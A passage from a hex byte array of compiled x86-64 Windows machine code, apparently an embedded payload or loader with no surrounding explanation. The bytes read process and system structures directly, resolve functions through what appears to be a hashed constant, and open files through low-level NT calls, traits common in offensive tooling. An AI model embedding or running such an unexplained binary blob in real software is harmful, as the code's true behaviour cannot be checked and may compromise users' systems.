08,0x37,0x01,0x00,0xFF,0xD0,0x48,0x89,0x45,0xF0,0x48,0x83,0x7D,0xF0,0x00,0x74,0x2E,0x8B,0x55,0xF8,0x48,0x8B,0x45,0xF0,0x41,0x89,0xD0,0x48,0x89,0xC2,0x48,0x8D,0x05,0x97,0xC7,0x00,0x00,0x48,0x89,0xC1,0xE8,0x6E,0x00,0x00,0x00,0x89,0x45,0xEC,0x83,0x7D,0xEC,0x00,0x74,0x0C,0xC7,0x45,0xFC,0x01,0x00,0x00,0x00,0xEB,0x04,0x90,0xEB,0x01,0x90,0x48,0x83,0x7D,0xF0,0x00,0x74,0x47,0x48,0x83,0x7D,0xF0,0x00,0x74,0x40,0x8B,0x55,0xF8,0x48,0x8B,0x45,0xF0,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x24,0xA5,0x00,0x00,0x48,0x8B,0x05,0x95,0x36,0x01,0x00,0xFF,0xD0,0x48,0x8B,0x55,0xF0,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x8D,0x36,0x01,0x00,0xFF,0xD0,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x8B,0x45,0xFC,0x48,0x83,0xC4,0x48,0x5B,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x30,0x48,0x89,0x4D,0x10,0x48,0x89,0x55,0x18,0x44,0x89,0x45,0x20,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xBA,0x01,0x00,0x00,0x00,0x48,0x8D,0x05,0x0C,0xC7,0x00,0x00,0x48,0x89,0xC1,0xE8,0xDF,0x19,0x00,0x00,0x41,0xB8,0x00,0x00,0x00,0x00,0xBA,0x0B,0x60,0x9C,0x2F,0x48,0x89,0xC1,0xE8,0xED,0x17,0x00,0x00,0x48,0x89,0x45,0xF0,0x48,0x83,0x7D,0xF0,0x00,0x74,0x2A,0x8B,0x4D,0x20,0x48,0x8B,0x55,0x18,0x48,0x8B,0x45,0x10,0x4C,0x8B,0x4D,0xF0,0x41,0x89,0xC8,0x48,0x89,0xC1,0x41,0xFF,0xD1,0x89,0x45,0x20,0x83,0x7D,0x20,0x00,0x74,0x0C,0xC7,0x45,0xFC,0x01,0x00,0x00,0x00,0xEB,0x04,0x90,0xEB,0x01,0x90,0x8B,0x45,0xFC,0x48,0x83,0xC4,0x30,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x20,0xC7,0x45,0xF0,0x60,0x00,0x00,0x00,0x8B,0x45,0xF0,0x65,0x48,0x8B,0x00,0x48,0x89,0x45,0xE8,0x48,0x8B,0x45,0xE8,0x48,0x89,0x45,0xF8,0x48,0x8B,0x45,0xF8,0x48,0x05,0x18,0x01,0x00,0x00,0x8B,0x00,0x89,0x45,0xF4,0x83,0x7D,0xF4,0x05,0x76,0x1B,0xB8,0x20,0x03,0xFE,0x7F,0x48,0x8B,0x00,0xBA,0x04,0x00,0xFE,0x7F,0x8B,0x12,0x89,0xD2,0x48,0x0F,0xAF,0xC2,0x48,0xC1,0xE8,0x18,0xEB,0x1A,0xB8,0x00,0x00,0xFE,0x7F,0x8B,0x00,0x89,0xC2,0xB8,0x04,0x00,0xFE,0x7F,0x8B,0x00,0x89,0xC0,0x48,0x0F,0xAF,0xC2,0x48,0xC1,0xE8,0x18,0x48,0x83,0xC4,0x20,0x5D,0xC3,0x55,0x57,0x53,0x48,0x81,0xEC,0x60,0x02,0x00,0x00,0x48,0x8D,0xAC,0x24,0x80,0x00,0x00,0x00,0x48,0x89,0x8D,0x00,0x02,0x00,0x00,0x48,0x89,0x95,0x08,0x02,0x00,0x00,0xC7,0x85,0xDC,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC7,0x85,0xD8,0x01,0x00,0x00,0x01,0x00,0x00,0xC0,0x48,0xC7,0x85,0xC8,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0xC0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC7,0x85,0xBC,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x8D,0x55,0xB0,0xB8,0x00,0x00,0x00,0x00,0xB9,0x41,0x00,0x00,0x00,0x48,0x89,0xD7,0xF3,0x48,0xAB,0x48,0xC7,0x85,0xD0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x8B,0x85,0x08,0x02,0x00,0x00,0xC7,0x00,0x00,0x00,0x00,0x00,0x48,0x83,0xBD,0x00,0x02,0x00,0x00,0x00,0x0F,0x84,0x50,0x02,0x00,0x00,0x48,0x8B,0x95,0x00,0x02,0x00,0x00,0x48,0x8D,0x45,0xB0,0x41,0xB8,0x04,0x01,0x00,0x00,0x48,0x89,0xC1,0xE8,0x34,0xA3,0x00,0x00,0x48,0x8B,0x85,0xC8,0x01,0x00,0x00,0x48,0x8D,0x95,0xC8,0x01,0x00,0x00,0x48,0x89,0x54,0x24,0x20,0x41,0xB9,0x00,0x00,0x00,0x00,0x41,0xB8,0x00,0x00,0x00,0x00,0xBA,0x00,0x04,0x00,0x00,0x48,0x89,0xC1,0xE8,0xC5,0x52,0x00,0x00,0x89,0x85,0xD8,0x01,0x00,0x00,0x81,0xBD,0xD8,0x01,0x00,0x00,0x1A,0x00,0x00,0x80,0x0F,0x84,0xF8,0x01,0x00,0x00,0x83,0xBD,0xD8,0x01,0x00,0x00,0x00,0x0F,0x88,0xEE,0x01,0x00,0x00,0x48,0x8B,0x85,0xC8,0x01,0x00,0x00,0x48,0x8D,0x8D,0xBC,0x01,0x00,0x00,0x48,0x8D,0x95,0xC0,0x01,0x00,0x00,0x49,0x89,0xC8,0x48,0x89,0xC1,0xE8,0xB8,0x0E,0x00,0x00,0x89,0x85,0xDC,0x01,0x00,0x00,0x83,0xBD,0xDC,0x01,0x00,0x00,0x00,0x0F,0x84,0x9D,0x01,0x00,0x00,0x48,0x8B,0x85,0xC0,0x01,0x00,0x00,0x0F,0xB7,0x00,0x66,0x85,0xC0,0x75,0x63,0x48,0x8B,0x85,0xC0,0x01,0x00,0x00,0x48,0x85,0xC0,0x0F,0x84,0x84,0x01,0x00,0x00,0x8B,0x85,0xBC,0x01,0x00,0x00,0x89,0xC2,0x48,0x8B,0x85,0xC0,0x01,0x00,0x00,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x8C,0xA2,0x00,0x00,0x48,0x8B,0x9D,0xC0,0x01,0x00,0x00,0x48,0x8B,0x05,0xF6,0x33,0x01,0x00,0xFF,0xD0,0x49,0x89,0xD8,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xF2,0x33,0x01,0x00,0xFF,0xD0,0x48,0xC7,0x85,0xC0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xE9,0x31,0x01,0x00,0x00,0x48,0x8B,0x85,0xC0,0x01,0x00,0x00,0x48,0x8B,0x40,0x08,0xBA,0x5C,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xB0,0xA2,0x00,0x00,0x48,0x83,0xC0,0x02,0x48,0x89,0x85,0xD0,0x01,0x00,0x00,0x48,0x8D,0x55,0xB0,0x48,0x8B,0x85,0xD0,0x01,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x28,0x34,0x01,0x00,0xFF,0xD0,0x85,0xC0,0x0F,0x85,0x86,0x00,0x00,0x00,0x48,0x8B,0x85,0xC0,0x01,0x00,0x00,0x48,0x85,0xC0,0x74,0x4E,0x8B,0x85,0xBC,0x01,0x00,0x00,0x89,0xC2,0x48,0x8B,0x85,0xC0,0x01,0x00,0x00,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xEB,0xA1,0x00,0x00,0x48,0x8B,0x9D,0xC0,0x01,0x00,0x00,0x48,0x8B,0x05,0x55,0x33,0x01,0x00,0xFF,0xD0,0x49,0x89,0xD8,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x51,0x33,0x01,0x00,0xFF,0xD0,0x48,0xC7,0x85,0xC0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x8B,0x85,0xC8,0x01,0x00,0x00,0x48,0x89,0xC1,0xE8,0x95,0x0E,0x00,0x00,0x48,0x8B,0x95,0x08,0x02,0x00,0x00,0x89,0x02,0x90,0x48,0x8B,0x85,0x08,0x02,0x00,0x00,0x8B,0x00,0x85,0xC0,0x0F,0x84,0x86,0x00,0x00,0x00,0xEB,0x6F,0x48,0x8B,0x85,0xC0,0x01,0x00,0x00,0x48,0x85,0xC0,0x0F,0x84,0x34,0xFE,0xFF,0xFF,0x8B,0x85,0xBC,0x01,0x00,0x00,0x89,0xC2,0x48,0x8B,0x85,0xC0,0x01,0x00,0x00,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x61,0xA1,0x00,0x00,0x48,0x8B,0x9D,0xC0,0x01,0x00,0x00,0x48,0x8B,0x05,0xCB,0x32,0x01,0x00,0xFF,0xD0,0x49,0x89,0xD8,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xC7,0x32,0x01,0x00,0xFF,0xD0,0x48,0xC7,0x85,0xC0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xE9,0xE1,0xFD,0xFF,0xFF,0x90,0xE9,0xDB,0xFD,0xFF,0xFF,0x90,0xE9,0xD5,0xFD,0xFF,0xFF,0xC7,0x85,0xDC,0x01,0x00,0x00,0x01,0x00,0x00,0x00,0xEB,0x0A,0x90,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x48,0x8B,0x85,0xC8,0x01,0x00,0x00,0x48,0x85,0xC0,0x74,0x0F,0x48,0x8B,0x85,0xC8,0x01,0x00,0x00,0x48,0x89,0xC1,0xE8,0x46,0x51,0x00,0x00,0x48,0x8B,0x85,0xC0,0x01,0x00,0x00,0x48,0x85,0xC0,0x74,0x5A,0x48,0x8B,0x85,0xC0,0x01,0x00,0x00,0x48,0x85,0xC0,0x74,0x4E,0x8B,0x85,0xBC,0x01,0x00,0x00,0x89,0xC2,0x48,0x8B,0x85,0xC0,0x01,0x00,0x00,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xB9,0xA0,0x00,0x00,0x48,0x8B,0x9D,0xC0,0x01,0x00,0x00,0x48,0x8B,0x05,0x23,0x32,0x01,0x00,0xFF,0xD0,0x49,0x89,0xD8,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x1F,0x32,0x01,0x00,0xFF,0xD0,0x48,0xC7,0x85,0xC0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x8B,0x85,0xDC,0x01,0x00,0x00,0x48,0x81,0xC4,0x60,0x02,0x00,0x00,0x5B,0x5F,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x10,0x48,0x89,0x4D,0x10,0x48,0x8B,0x45,0x10,0x0F,0xB6,0x10,0x48,0x8B,0x45,0x10,0x48,0x83,0xC0,0x01,0x0F,0xB6,0x00,0x38,0xC2,0x75,0x16,0x48,0x8B,0x45,0x10,0x48,0x83,0xC0,0x01,0x0F,0xB6,0x00,0x3C,0x5C,0x75,0x07,0xB8,0x01,0x00,0x00,0x00,0xEB,0x5B,0x48,0x8B,0x45,0x10,0x0F,0xB6,0x00,0x83,0xC8,0x20,0x88,0x45,0xFF,0x80,0x7D,0xFF,0x60,0x7E,0x06,0x80,0x7D,0xFF,0x7A,0x7E,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x3B,0x48,0x8B,0x45,0x10,0x48,0x83,0xC0,0x01,0x0F,0xB6,0x00,0x88,0x45,0xFF,0x80,0x7D,0xFF,0x3A,0x74,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x20,0x48,0x8B,0x45,0x10,0x48,0x83,0xC0,0x02,0x0F,0xB6,0x00,0x88,0x45,0xFF,0x80,0x7D,0xFF,0x5C,0x74,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x05,0xB8,0x01,0x00,0x00,0x00,0x48,0x83,0xC4,0x10,0x5D,0xC3,0x55,0x48,0x81,0xEC,0x30,0x02,0x00,0x00,0x48,0x8D,0xAC,0x24,0x80,0x00,0x00,0x00,0x48,0x89,0x8D,0xC0,0x01,0x00,0x00,0x48,0x89,0x95,0xC8,0x01,0x00,0x00,0x48,0x8B,0x85,0xC0,0x01,0x00,0x00,0x48,0x8B,0x40,0x08,0x41,0xB8,0x04,0x01,0x00,0x00,0x48,0x8D,0x15,0x0E,0xC2,0x00,0x00,0x48,0x89,0xC1,0xE8,0x0A,0xA0,0x00,0x00,0x48,0x8B,0x85,0xC8,0x01,0x00,0x00,0x48,0x89,0xC1,0xE8,0x1A,0xFF,0xFF,0xFF,0x85,0xC0,0x75,0x21,0xE8,0xAF,0x00,0x00,0x00,0x48,0x89,0xC2,0x48,0x8B,0x85,0xC0,0x01,0x00,0x00,0x48,0x8B,0x40,0x08,0x41,0xB8,0x04,0x01,0x00,0x00,0x48,0x89,0xC1,0xE8,0xCE,0x9F,0x00,0x00,0x48,0x8B,0x95,0xC8,0x01,0x00,0x00,0x48,0x8D,0x45,0xA0,0x41,0xB8,0x04,0x01,0x00,0x00,0x48,0x89,0xC1,0xE8,0x3D,0x9F,0x00,0x00,0x48,0x8B,0x85,0xC0,0x01,0x00,0x00,0x48,0x8B,0x40,0x08,0x48,0x8D,0x55,0xA0,0x41,0xB8,0x04,0x01,0x00,0x00,0x48,0x89,0xC1,0xE8,0x98,0x9F,0x00,0x00,0x48,0x8B,0x85,0xC0,0x01,0x00,0x00,0x48,0x8B,0x40,0x08,0xBA,0x04,0x01,0x00,0x00,0x48,0x89,0xC1,0xE8,0xE0,0x9C,0x00,0x00,0x89,0xC2,0x48,0x8B,0x85,0xC0,0x01,0x00,0x00,0x66,0x89,0x10,0x48,0x8B,0x85,0xC0,0x01,0x00,0x00,0x0F,0xB7,0x00,0x8D,0x14,0x00,0x48,0x8B,0x85,0xC0,0x01,0x00,0x00,0x66,0x89,0x10,0x48,0x8B,0x85,0xC0,0x01,0x00,0x00,0x0F,0xB7,0x00,0x8D,0x50,0x02,0x48,0x8B,0x85,0xC0,0x01,0x00,0x00,0x66,0x89,0x50,0x02,0x90,0x48,0x81,0xC4,0x30,0x02,0x00,0x00,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x20,0xC7,0x45,0xEC,0x60,0x00,0x00,0x00,0x8B,0x45,0xEC,0x65,0x48,0x8B,0x00,0x48,0x89,0x45,0xE0,0x48,0x8B,0x45,0xE0,0x48,0x89,0x45,0xF8,0x48,0x8B,0x45,0xF8,0x48,0x83,0xC0,0x20,0x48,0x8B,0x00,0x48,0x89,0x45,0xF0,0x48,0x8B,0x45,0xF0,0x48,0x8B,0x40,0x40,0x48,0x83,0xC4,0x20,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x81,0xEC,0xC0,0x00,0x00,0x00,0x48,0x89,0x4D,0x10,0x48,0x89,0x55,0x18,0x44,0x89,0x45,0x20,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x66,0x0F,0xEF,0xC0,0x0F,0x11,0x45,0xC0,0x0F,0x11,0x45,0xD0,0x0F,0x11,0x45,0xE0,0x48,0xC7,0x45,0xA8,0x00,0x00,0x00,0x00,0x8B,0x45,0x20,0x48,0x89,0x45,0xA8,0xC7,0x45,0xC0,0x30,0x00,0x00,0x00,0x48,0xC7,0x45,0xC8,0x00,0x00,0x00,0x00,0xC7,0x45,0xD8,0x40,0x00,0x00,0x00,0x48,0x8B,0x45,0x10,0x48,0x89,0x45,0xD0,0x48,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0x4C,0x8D,0x45,0xB0,0x48,0x8D,0x4D,0xC0,0x48,0x8D,0x45,0xF0,0xC7,0x44,0x24,0x50,0x00,0x00,0x00,0x00,0x48,0xC7,0x44,0x24,0x48,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x40,0x20,0x00,0x00,0x00,0xC7,0x44,0x24,0x38,0x05,0x00,0x00,0x00,0xC7,0x44,0x24,0x30,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x28,0x80,0x00,0x00,0x00,0x48,0x8D,0x55,0xA8,0x48,0x89,0x54,0x24,0x20,0x4D,0x89,0xC1,0x49,0x89,0xC8,0xBA,0x16,0x01,0x12,0x00,0x48,0x89,0xC1,0xE8,0x94,0x50,0x00,0x00,0x89,0x45,0xFC,0x81,0x7D,0xFC,0x3A,0x00,0x00,0xC0,0x74,0x09,0x81,0x7D,0xFC,0x33,0x00,0x00,0xC0,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x7E,0x83,0x7D,0xFC,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x71,0x48,0x8B,0x45,0xF0,0x48,0xC7,0x44,0x24,0x40,0x00,0x00,0x00,0x00,0x48,0xC7,0x44,0x24,0x38,0x00,0x00,0x00,0x00,0x8B,0x55,0x20,0x89,0x54,0x24,0x30,0x48,0x8B,0x55,0x18,0x48,0x89,0x54,0x24,0x28,0x48,0x8D,0x55,0xB0,0x48,0x89,0x54,0x24,0x20,0x41,0xB9,0x00,0x00,0x00,0x00,0x41,0xB8,0x00,0x00,0x00,0x00,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x7D,0x50,0x00,0x00,0x89,0x45,0xFC,0x48,0x8B,0x45,0xF0,0x48,0x89,0xC1,0xE8,0xAD,0x4D,0x00,0x00,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x83,0x7D,0xFC,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x05,0xB8,0x01,0x00,0x00,0x00,0x48,0x81,0xC4,0xC0,0x00,0x00,0x00,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x81,0xEC,0xB0,0x00,0x00,0x00,0x48,0x89,0x4D,0x10,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x66,0x0F,0xEF,0xC0,0x0F,0x11,0x45,0xC0,0x0F,0x11,0x45,0xD0,0x0F,0x11,0x45,0xE0,0xC7,0x45,0xC0,0x30,0x00,0x00,0x00,0x48,0xC7,0x45,0xC8,0x00,0x00,0x00,0x00,0xC7,0x45,0xD8,0x40,0x00,0x00,0x00,0x48,0x8B,0x45,0x10,0x48,0x89,0x45,0xD0,0x48,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0x48,0x8D,0x4D,0xB0,0x48,0x8D,0x55,0xC0,0x48,0x8D,0x45,0xF0,0xC7,0x44,0x24,0x50,0x00,0x00,0x00,0x00,0x48,0xC7,0x44,0x24,0x48,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x40,0x20,0x00,0x00,0x00,0xC7,0x44,0x24,0x38,0x03,0x00,0x00,0x00,0xC7,0x44,0x24,0x30,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x28,0x80,0x00,0x00,0x00,0x48,0xC7,0x44,0x24,0x20,0x00,0x00,0x00,0x00,0x49,0x89,0xC9,0x49,0x89,0xD0,0xBA,0x89,0x00,0x12,0x00,0x48,0x89,0xC1,0xE8,0x43,0x4F,0x00,0x00,0x89,0x45,0xFC,0x81,0x7D,0xFC,0x3A,0x00,0x00,0xC0,0x74,0x12,0x81,0x7D,0xFC,0x33,0x00,0x00,0xC0,0x74,0x09,0x81,0x7D,0xFC,0x3B,0x00,0x00,0xC0,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x26,0x83,0x7D,0xFC,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x19,0x48,0x8B,0x45,0xF0,0x48,0x89,0xC1,0xE8,0x9E,0x4C,0x00,0x00,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xB8,0x01,0x00,0x00,0x00,0x48,0x81,0xC4,0xB0,0x00,0x00,0x00,0x5D,0xC3,0x55,0x57,0x48,0x81,0xEC,0x88,0x02,0x00,0x00,0x48,0x8D,0xAC,0x24,0x80,0x00,0x00,0x00,0x48,0x89,0x8D,0x20,0x02,0x00,0x00,0x66,0x0F,0xEF,0xC0,0x0F,0x11,0x85,0xC0,0x01,0x00,0x00,0x0F,0x11,0x85,0xD0,0x01,0x00,0x00,0x0F,0x11,0x85,0xE0,0x01,0x00,0x00,0x48,0x8D,0x55,0xB0,0xB8,0x00,0x00,0x00,0x00,0xB9,0x41,0x00,0x00,0x00,0x48,0x89,0xD7,0xF3,0x48,0xAB,0x48,0xC7,0x45,0xA0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xA8,0x00,0x00,0x00,0x00,0x48,0x8D,0x45,0xB0,0x48,0x89,0x45,0xA8,0x48,0x83,0xBD,0x20,0x02,0x00,0x00,0x00,0x75,0x07,0xB8,0x01,0x00,0x00,0x00,0xEB,0x7D,0x48,0x8B,0x95,0x20,0x02,0x00,0x00,0x48,0x8D,0x45,0xA0,0x48,0x89,0xC1,0xE8,0xD1,0xFB,0xFF,0xFF,0xC7,0x85,0xC0,0x01,0x00,0x00,0x30,0x00,0x00,0x00,0x48,0xC7,0x85,0xC8,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC7,0x85,0xD8,0x01,0x00,0x00,0x40,0x00,0x00,0x00,0x48,0x8D,0x45,0xA0,0x48,0x89,0x85,0xD0,0x01,0x00,0x00,0x48,0xC7,0x85,0xE0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0xE8,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x8D,0x85,0xC0,0x01,0x00,0x00,0x48,0x89,0xC1,0xE8,0x86,0x50,0x00,0x00,0x89,0x85,0xFC,0x01,0x00,0x00,0x83,0xBD,0xFC,0x01,0x00,0x00,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x05,0xB8,0x01,0x00,0x00,0x00,0x48,0x81,0xC4,0x88,0x02,0x00,0x00,0x5F,0x5D,0xC3,0x55,0x57,0x48,0x81,0xEC,0xD8,0x02,0x00,0x00,0x48,0x8D,0xAC,0x24,0x80,0x00,0x00,0x00,0x48,0x89,0x8D,0x70,0x02,0x00,0x00,0x48,0xC7,0x85,0x40,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x66,0x0F,0xEF,0xC0,0x0F,0x11,0x85,0x10,0x02,0x00,0x00,0x0F,0x11,0x85,0x20,0x02,0x00,0x00,0x0F,0x11,0x85,0x30,0x02,0x00,0x00,0x48,0xC7,0x85,0xF8,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0xF8,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x8D,0x55,0xF0,0xB8,0x00,0x00,0x00,0x00,0xB9,0x41,0x00,0x00,0x00,0x48,0x89,0xD7,0xF3,0x48,0xAB,0x48,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0x48,0x8D,0x45,0xF0,0x48,0x89,0x45,0xE8,0x48,0x83,0xBD,0x70,0x02,0x00,0x00,0x00,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0x13,0x01,0x00,0x00,0x48,0x8B,0x95,0x70,0x02,0x00,0x00,0x48,0x8D,0x45,0xE0,0x48,0x89,0xC1,0xE8,0xB8,0xFA,0xFF,0xFF,0xC7,0x85,0x10,0x02,0x00,0x00,0x30,0x00,0x00,0x00,0x48,0xC7,0x85,0x18,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0xC7,0x85,0x28,0x02,0x00,0x00,0x40,0x00,0x00,0x00,0x48,0x8D,0x45,0xE0,0x48,0x89,0x85,0x20,0x02,0x00,0x00,0x48,0xC7,0x85,0x30,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0x38,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x4C,0x8D,0x85,0x00,0x02,0x00,0x00,0x48,0x8D,0x8D,0x10,0x02,0x00,0x00,0x48,0x8D,0x85,0x40,0x02,0x00,0x00,0xC7,0x44,0x24,0x50,0x00,0x00,0x00,0x00,0x48,0xC7,0x44,0x24,0x48,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x40,0x20,0x00,0x00,0x00,0xC7,0x44,0x24,0x38,0x01,0x00,0x00,0x00,0xC7,0x44,0x24,0x30,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x28,0x80,0x00,0x00,0x00,0x48,0x8D,0x95,0xF8,0x01,0x00,0x00,0x48,0x89,0x54,0x24,0x20,0x4D,0x89,0xC1,0x49,0x89,0xC8,0xBA,0x89,0x00,0x12,0x00,0x48,0x89,0xC1,0xE8,0xB0,0x4C,0x00,0x00,0x89,0x85,0x4C,0x02,0x00,0x00,0x81,0xBD,0x4C,0x02,0x00,0x00,0x43,0x00,0x00,0xC0,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x42,0x81,0xBD,0x4C,0x02,0x00,0x00,0x34,0x00,0x00,0xC0,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x2F,0x83,0xBD,0x4C,0x02,0x00,0x00,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x1F,0x48,0x8B,0x85,0x40,0x02,0x00,0x00,0x48,0x89,0xC1,0xE8,0xFE,0x49,0x00,0x00,0x48,0xC7,0x85,0x40,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0xB8,0x01,0x00,0x00,0x00,0x48,0x81,0xC4,0xD8,0x02,0x00,0x00,0x5F,0x5D,0xC3,0x55,0x57,0x48,0x81,0xEC,0xD8,0x02,0x00,0x00,0x48,0x8D,0xAC,0x24,0x80,0x00,0x00,0x00,0x48,0x89,0x8D,0x70,0x02,0x00,0x00,0x48,0xC7,0x85,0x40,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x66,0x0F,0xEF,0xC0,0x0F,0x11,0x85,0x10,0x02,0x00,0x00,0x0F,0x11,0x85,0x20,0x02,0x00,0x00,0x0F,0x11,0x85,0x30,0x02,0x00,0x00,0x48,0xC7,0x85,0xF8,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0xF8,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x8D,0x55,0xF0,0xB8,0x00,0x00,0x00,0x00,0xB9,0x41,0x00,0x00,0x00,0x48,0x89,0xD7,0xF3,0x48,0xAB,0x48,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0x48,0x8D,0x45,0xF0,0x48,0x89,0x45,0xE8,0x48,0x8B,0x95,0x70,0x02,0x00,0x00,0x48,0x8D,0x45,0xE0,0x48,0x89,0xC1,0xE8,0x1D,0xF9,0xFF,0xFF,0xC7,0x85,0x10,0x02,0x00,0x00,0x30,0x00,0x00,0x00,0x48,0xC7,0x85,0x18,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0xC7,0x85,0x28,0x02,0x00,0x00,0x40,0x00,0x00,0x00,0x48,0x8D,0x45,0xE0,0x48,0x89,0x85,0x20,0x02,0x00,0x00,0x48,0xC7,0x85,0x30,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0x38,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x4C,0x8D,0x85,0x00,0x02,0x00,0x00,0x48,0x8D,0x8D,0x10,0x02,0x00,0x00,0x48,0x8D,0x85,0x40,0x02,0x00,0x00,0xC7,0x44,0x24,0x50,0x00,0x00,0x00,0x00,0x48,0xC7,0x44,0x24,0x48,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x40,0x01,0x00,0x00,0x00,0xC7,0x44,0x24,0x38,0x02,0x00,0x00,0x00,0xC7,0x44,0x24,0x30,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x28,0x80,0x00,0x00,0x00,0x48,0x8D,0x95,0xF8,0x01,0x00,0x00,0x48,0x89,0x54,0x24,0x20,0x4D,0x89,0xC1,0x49,0x89,0xC8,0xBA,0x89,0x00,0x12,0x00,0x48,0x89,0xC1,0xE8,0x15,0x4B,0x00,0x00,0x89,0x85,0x4C,0x02,0x00,0x00,0x81,0xBD,0x4C,0x02,0x00,0x00,0x35,0x00,0x00,0xC0,0x75,0x07,0xB8,0x01,0x00,0x00,0x00,0xEB,0x42,0x81,0xBD,0x4C,0x02,0x00,0x00,0x34,0x00,0x00,0xC0,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x2F,0x83,0xBD,0x4C,0x02,0x00,0x00,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x1F,0x48,0x8B,0x85,0x40,0x02,0x00,0x00,0x48,0x89,0xC1,0xE8,0x63,0x48,0x00,0x00,0x48,0xC7,0x85,0x40,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0xB8,0x01,0x00,0x00,0x00,0x48,0x81,0xC4,0xD8,0x02,0x00,0x00,0x5F,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x40,0x48,0xC7,0